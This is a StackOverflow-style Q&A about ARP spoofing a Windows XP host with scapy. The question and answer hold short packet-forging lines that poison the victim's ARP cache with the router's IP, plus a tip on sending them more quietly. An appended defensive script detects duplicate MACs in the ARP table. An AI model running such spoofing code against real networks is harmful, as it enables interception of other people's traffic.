Question

I am attacking a Windows XP machine with Backtrack 5 using scapy.

Now that's my code:

#! /usr/bin/env python

from scapy.all import *

arp_p = ARP(op = 1, psrc = "192.168.0.1", pdst = "192.168.0.106", hwsrc = "00:0c:29:f0:2d:19", hwdst = "ff:ff:ff:ff:ff:ff")
send(arp_p)

The code above actually sends two packets for some reason. One time my backtrack mac is asking:

who has 192.168.0.106 (Victim's IP)? Tell 192.168.0.108 (Backtrack's IP - NOT SUPPOSED TO BE!).

Then he gets the "is at" answer from the victim.

And the second time my backtrack's mac is asking:

who has 192.168.0.106 (Victim's IP)? Tell 192.168.0.1 (The router's IP).

Then he gets the "is at" answer from the victim again.

Then the victim's ARP table has two lines of the same mac but different IPs, one is the Backtrack's real IP and the second is the router's IP.

Why is this happening?


Solution

The first ARP packet you see comes from Scapy, because it wants to fill the Ether frame with the Victim's MAC address before send()-ing your ARP packet.

If you don't want that to happen, try (sendp sends at layer 2):

>>> sendp(Ether(dst=ETHER_BROADCAST)/ARP(psrc = "192.168.0.1", pdst = "192.168.0.106"))

You can replace ETHER_BROADCAST with your victim's MAC address, that's less "noisy".
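
The symptom described in the question, one MAC address cached for both the router's IP and a second host's IP, is also what a defender checks for on the affected machine. The following is an added example, not code from the question or the answer: it parses `arp -a` output and reports any unicast MAC that is cached for more than one IP. The sample table is constructed, and the function names and the gateway parameter are assumptions of this example.

```python
import re
from collections import defaultdict

# Constructed sample: `arp -a` on the Windows host after the two requests in
# the question. The first two rows use the question's addresses; the third
# row is an invented, unrelated neighbour.
SAMPLE_ARP_A = """\
Interface: 192.168.0.106 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           00-0c-29-f0-2d-19     dynamic
  192.168.0.108         00-0c-29-f0-2d-19     dynamic
  192.168.0.110         00-1a-2b-3c-4d-5e     dynamic
"""

ENTRY = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"([0-9A-Fa-f]{2}(?:[-:][0-9A-Fa-f]{2}){5})\s+(\w+)\s*$"
)

def parse_arp_table(text):
    """Return (ip, mac, type) tuples, MACs normalised to aa:bb:cc:dd:ee:ff."""
    rows = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            ip, mac, kind = m.groups()
            rows.append((ip, mac.lower().replace("-", ":"), kind.lower()))
    return rows

def find_conflicts(rows, gateway_ip):
    """List every unicast MAC that is cached for more than one IP address."""
    by_mac = defaultdict(set)
    for ip, mac, _kind in rows:
        if int(mac[:2], 16) & 1:      # group bit set: broadcast/multicast row
            continue
        by_mac[mac].add(ip)
    return [
        {"mac": mac, "ips": sorted(ips), "gateway_affected": gateway_ip in ips}
        for mac, ips in sorted(by_mac.items())
        if len(ips) > 1
    ]

if __name__ == "__main__":
    for hit in find_conflicts(parse_arp_table(SAMPLE_ARP_A), "192.168.0.1"):
        print("MAC %(mac)s is cached for %(ips)s (gateway: %(gateway_affected)s)" % hit)
```

A shared MAC is a signal to investigate rather than proof of spoofing: proxy ARP and hosts with several addresses on one interface produce the same pattern.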

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow